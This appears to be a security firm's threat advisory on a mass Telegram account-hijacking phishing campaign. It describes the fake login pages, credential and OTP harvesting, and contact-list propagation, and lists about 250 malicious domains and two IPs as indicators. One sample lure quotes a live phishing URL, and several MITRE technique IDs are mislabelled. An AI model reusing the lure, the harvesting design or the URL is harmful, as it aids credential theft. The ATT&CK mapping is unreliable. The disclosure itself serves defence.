Mass Telegram account hijacking via supply-chain phishing campaign

November 11, 2024
Telegram Account Hijacking Phishing Campaign Threat Advisory Cybersecurity

iZOOlogic Red Team has uncovered a recent malicious phishing campaign targeting Telegram users on a large scale. This attack involves the use of phishing links disguised as Telegram login pages, aimed at harvesting user credentials such as mobile number, OTPs, and 2FA passwords.


The threat actor behind this campaign is identified as “Tai Tsi,” based on the Whois registration details, with all flagged domains originating from Hong Kong, China.

During the research, we found more than 200 similar phishing domains registered under the .top TLD and aimed to compromise user accounts in a supply chain attack by hijacking and further propagating the malicious links.

Modus Operandi

  1. Phishing Link Distribution
    • The attacker sends an initial phishing message with a link, appearing to be from Telegram to the victim. The message may say, “There are your photos and videos in it: http://lbvamvemkxfi.top/login”.
    • The link directs the victim to a fake Telegram login page designed to steal credentials, OTPs, and passwords.
  2. Credential Harvesting
    • Once the victim enters their credentials, they are harvested by the attacker in real time.
    • The attacker immediately uses the stolen credentials to hijack the victim’s Telegram account.
  3. Account Takeover
    • The attacker then sends a similar phishing message from the compromised account to the victim’s entire contact list.
    • The cycle repeats, leading to a massive chain of compromised accounts across Telegram.
  4. Further Abuse
    • In some cases, the attackers might use the compromised accounts to spread malware, request sensitive information from contacts, or impersonate the victim for financial fraud.

Source Code Analysis

  1. Input Validation and Phone Number Formatting
    • The code includes logic for validating and formatting phone numbers based on country-specific patterns. This enhances the legitimacy of the phishing page by ensuring that users enter valid numbers, increasing the success rate of data collection.
    • Countries such as India (IN), USA (US), and Canada (CA) are specifically targeted, though the list can easily be expanded to include more countries.
  2. AJAX Request for Data Collection
    • The phishing script captures the phone number, OTP, and 2FA Password and sends it to the attacker’s server using an AJAX POST request.
  3. Local Storage for Tracking
    • The phone number and a unique identifier (UUID) are stored in the browser’s localStorage, which can be used to track the user’s activity on the phishing page. Once the user shares the sensitive credentials (OTP and password), the user will be redirected to a pornography site. The stored information in local storage and cookies are used to validate the user and accordingly keep on redirecting the existing user to the hardcoded pornography domain.

Tactics, Techniques, and Procedures (TTPs)

  • T1071.001: Phishing via Telegram Messaging Service.
  • T1204.003: User Execution – Compelling users to interact with a malicious link or message.
  • T1566.002: Phishing – Use of a fraudulent Telegram login page to steal credentials.
  • T1078: Valid Accounts – Using harvested credentials to access and control the victim’s Telegram account.
  • T1090: Proxy – Using compromised accounts to propagate the phishing link and impersonate the victim.

Mitigation and Recommendations

  1. User Awareness and Training
    • Users should be educated about the risks of phishing attacks and how to recognize suspicious messages.
    • Always verify the legitimacy of unsolicited links, even when they come from known contacts.
  2. Two-Factor Authentication (2FA)
    • Enforce the use of 2FA on Telegram accounts to add an additional layer of security.
  3. Credential Hygiene
    • Encourage users to avoid sharing OTPs, passwords, or login credentials through Telegram or any untrusted platform.
    • Regularly monitor account activity for unauthorized logins.
  4. Incident Response
    • If an account is compromised, users should immediately log out of all sessions, reset passwords, and notify contacts about the compromise.
  5. Avoid Click on Malicious Domains
    • Avoid clicking on malicious random character domains, such as HTTP[:]//lbvamvemkxfi.top.

Conclusion

This phishing campaign demonstrates how threat actors can exploit human trust and social networks like Telegram to orchestrate large-scale supply chain compromises. Further, attackers can misuse compromised Telegram accounts to harvest sensitive data, including user chats, contacts, and private information, which can then be leveraged for more insidious attacks such as extortion, blackmail, or identity theft. The compromised accounts could also be used to spread additional phishing campaigns, malware, or disinformation, expanding the scope of the attack by targeting the victim’s contacts and further compromising other individuals or organizations in the victim’s network.

Annexure

Indicators of Compromise

Malicious IP Address

  1. 156[.]251[.]139[.]34
  2. 23[.]224[.]184[.]250

Malicious Domains

  1. delqggdxkdyp[.]top
  2. idkbsmvenxtm[.]top
  3. fnxyzihiendz[.]top
  4. seyyhnzqvgoy[.]top
  5. kmhxuymkzowe[.]top
  6. sqjusunzsiyl[.]top
  7. nihjodoqndmn[.]top
  8. edohaguylkjx[.]top
  9. gfsclmsdmqmp[.]top
  10. jubkcmkbsarb[.]top
  11. weqetutiohnh[.]top
  12. lbvamvemkxfi[.]top
  13. jlcxbrhtddxh[.]top
  14. nwhijnqbfawk[.]top
  15. lsywcgvmsooq[.]top
  16. recwrqhvpnpd[.]top
  17. npyyulqlqhjg[.]top
  18. typhzeowbjol[.]top
  19. auyqhalqjckc[.]top
  20. hhothofmznsb[.]top
  21. swcfukvqxmec[.]top
  22. xrroawddkcir[.]top
  23. rsfzdrtidyfn[.]top
  24. lpeqemxeprfh[.]top
  25. tqsqqzxnxycl[.]top
  26. uekkvnqqdohm[.]top
  27. glhqbtfkflef[.]top
  28. tpqszgbzlfmo[.]top
  29. liihqwkqqvxn[.]top
  30. yhiroybgtrkk[.]top
  31. zqqahpegkgyb[.]top
  32. wenllpismlaz[.]top
  33. nantylceonqb[.]top
  34. si3qqt4ur[.]top
  35. moneylioniqj[.]top
  36. moneylioneaa[.]top
  37. moneylionulc[.]top
  38. moneylionbqg[.]top
  39. moneylionplq[.]top
  40. moneylionlim[.]top
  41. moneylionpxl[.]top
  42. moneylionhbi[.]top
  43. moneylionfha[.]top
  44. moneylionwrq[.]top
  45. moneylionlpn[.]top
  46. moneylionjio[.]top
  47. moneylionixw[.]top
  48. moneylionlve[.]top
  49. moneylioncjj[.]top
  50. moneylionayy[.]top
  51. moneylionwtt[.]top
  52. moneylionrpw[.]top
  53. moneylionolu[.]top
  54. lockingnf[.]top
  55. moneylionwvh[.]top
  56. moneylionpus[.]top
  57. moneylionmxk[.]top
  58. lockingnk[.]top
  59. zd977[.]icu
  60. recoupwl[.]top
  61. recouphh[.]top
  62. xyh79[.]top
  63. moneylionqlr[.]top
  64. recoupqy[.]top
  65. lockingmb[.]top
  66. yhdgpxvqw[.]top
  67. xyh78[.]top
  68. xyk20[.]top
  69. varomoneyav[.]top
  70. varomoneyrh[.]top
  71. varomoneytf[.]top
  72. unlockdfx[.]top
  73. unlockfir[.]top
  74. unlockgun[.]top
  75. unlocklsr[.]top
  76. unlockolb[.]top
  77. unlockpge[.]top
  78. unlockccf[.]top
  79. unlockbvq[.]top
  80. unlockspq[.]top
  81. unlockfza[.]top
  82. unlockauh[.]top
  83. unlockfkm[.]top
  84. unlockgvw[.]top
  85. unlockfpq[.]top
  86. unlockhmj[.]top
  87. moneylionpuc[.]top
  88. moneylionrhu[.]top
  89. moneylionnpw[.]top
  90. moneylionvfe[.]top
  91. moneylionyqt[.]top
  92. moneylionruo[.]top
  93. moneylionhwc[.]top
  94. moneylionkug[.]top
  95. moneyliondpn[.]top
  96. lockinggs[.]top
  97. lockingxn[.]top
  98. lockingaq[.]top
  99. lockingvb[.]top
  100. lockingzj[.]top
  101. lockingvf[.]top
  102. coercionjl[.]top
  103. unlockebb[.]top
  104. varomoneyoz[.]top
  105. unlockbfw[.]top
  106. recouptob[.]top
  107. varomoneytp[.]top
  108. unlockppa[.]top
  109. varomoneyei[.]top
  110. unlockenr[.]top
  111. unlockork[.]top
  112. lockinglu[.]top
  113. lockingcz[.]top
  114. recoupoe[.]top
  115. unlockxgn[.]top
  116. unlocknbp[.]top
  117. varomoneypo[.]top
  118. unlockosr[.]top
  119. moneylionqbg[.]top
  120. varomoneybw[.]top
  121. varomoneydo[.]top
  122. unlockvkj[.]top
  123. unlockvev[.]top
  124. recoupjfa[.]top
  125. o7z1qf8mf[.]top
  126. of1zgcahn[.]top
  127. 82fkgjyai[.]top
  128. bubdhm5fg[.]top
  129. 793hd9hld[.]top
  130. th8qpavse[.]top
  131. 9ynuupnsv[.]top
  132. rqmzcylp8[.]top
  133. bwpr9yg7a[.]top
  134. xwo8z3fyu[.]top
  135. lzdhtgug3[.]top
  136. rq6ei353o[.]top
  137. ppihr8vtg[.]top
  138. durbjr235[.]top
  139. df4xsdnsx[.]top
  140. 55r34huk5[.]top
  141. 4gv3b5jwq[.]top
  142. wxp4xeegn[.]top
  143. xqkst6s5z[.]top
  144. 464vdervb[.]top
  145. cy2fjocax[.]top
  146. v79aoi8f9[.]top
  147. gfbv5qk7w[.]top
  148. fsyw8irri[.]top
  149. 99uebjdpa[.]top
  150. y14jmv91w[.]top
  151. v5pa8m6n7[.]top
  152. w61kxwap7[.]top
  153. 2l9pdrxvr[.]top
  154. qk4g5g1cp[.]top
  155. lockingfn[.]top
  156. regulation-lfu[.]top
  157. regulation-snh[.]top
  158. regulation-ima[.]top
  159. regulation-rec[.]top
  160. regulation-ibx[.]top
  161. lockingtc[.]top
  162. lockingsj[.]top
  163. regulation-com[.]top
  164. regulation-dly[.]top
  165. recovery-wss[.]top
  166. regulation-ylh[.]top
  167. regulation-mqe[.]top
  168. recovery-gim[.]top
  169. regulation-llr[.]top
  170. recovery-bcy[.]top
  171. recovery-pfi[.]top
  172. recovery-bbs[.]top
  173. regulation-hob[.]top
  174. recovery-jat[.]top
  175. recovery-ivh[.]top
  176. regulation-drx[.]top
  177. regulation-jyk[.]top
  178. regulation-kfg[.]top
  179. regulation-nbi[.]top
  180. regulation-dqs[.]top
  181. recovery-hxc[.]top
  182. regulation-ppl[.]top
  183. recovery-uwu[.]top
  184. recovery-nmw[.]top
  185. recovery-vwn[.]top
  186. source-y5q[.]top
  187. regulation-dsq[.]top
  188. regulation-hlf[.]top
  189. regulation-ihu[.]top
  190. recovery-xfm[.]top
  191. recovery-orc[.]top
  192. recovery-hrx[.]top
  193. recovery-itq[.]top
  194. recovery-jz[.]top
  195. recovery-pe[.]top
  196. recovery-xu[.]top
  197. recovery-qe[.]top
  198. recovery-yx[.]top
  199. recovery-un[.]top
  200. recovery-rq[.]top
  201. recovery-kc[.]top
  202. recovery-uh[.]top
  203. recovery-uk[.]top
  204. recovery-ow[.]top
  205. recovery-fo[.]top
  206. recovery-mg[.]top
  207. recovery-he[.]top
  208. recovery-ff[.]top
  209. recovery-ml[.]top
  210. recovery-dc[.]top
  211. recovery-ci[.]top
  212. recovery-ux[.]top
  213. recovery-qp[.]top
  214. recovery-dtf[.]top
  215. recovery-cr[.]top
  216. recovery-vb[.]top
  217. recovery-rjr[.]top
  218. recovery-gzo[.]top
  219. recovery-dlg[.]top
  220. recovery-qoa[.]top
  221. recovery-xhp[.]top
  222. recovery-drj[.]top
  223. recovery-yq[.]top
  224. recovery-mn[.]top
  225. recovery-wq[.]top
  226. recovery-pes[.]top
  227. recovery-mv[.]top
  228. recovery-kx[.]top
  229. recovery-ws[.]top
  230. recovery-wdx[.]top
  231. recovery-fqc[.]top
  232. recovery-ehu[.]top
  233. recovery-vpw[.]top
  234. recovery-wvo[.]top
  235. recovery-tu[.]top
  236. recovery-ecd[.]top
  237. moneylioncng[.]top
  238. unlockshg[.]top
  239. moneylionzwu[.]top
  240. unlocksov[.]top
  241. moneylioniyb[.]top
  242. unlocktsd[.]top
  243. recoupzwu[.]top
  244. unlockbyd[.]top
  245. recouprq[.]top
  246. recoupdz[.]top
  247. recoupfp[.]top
  248. unlockxtp[.]top
  249. recoupff[.]top
  250. lockingji[.]top
  251. xyh83[.]top
About the author

Leave a Reply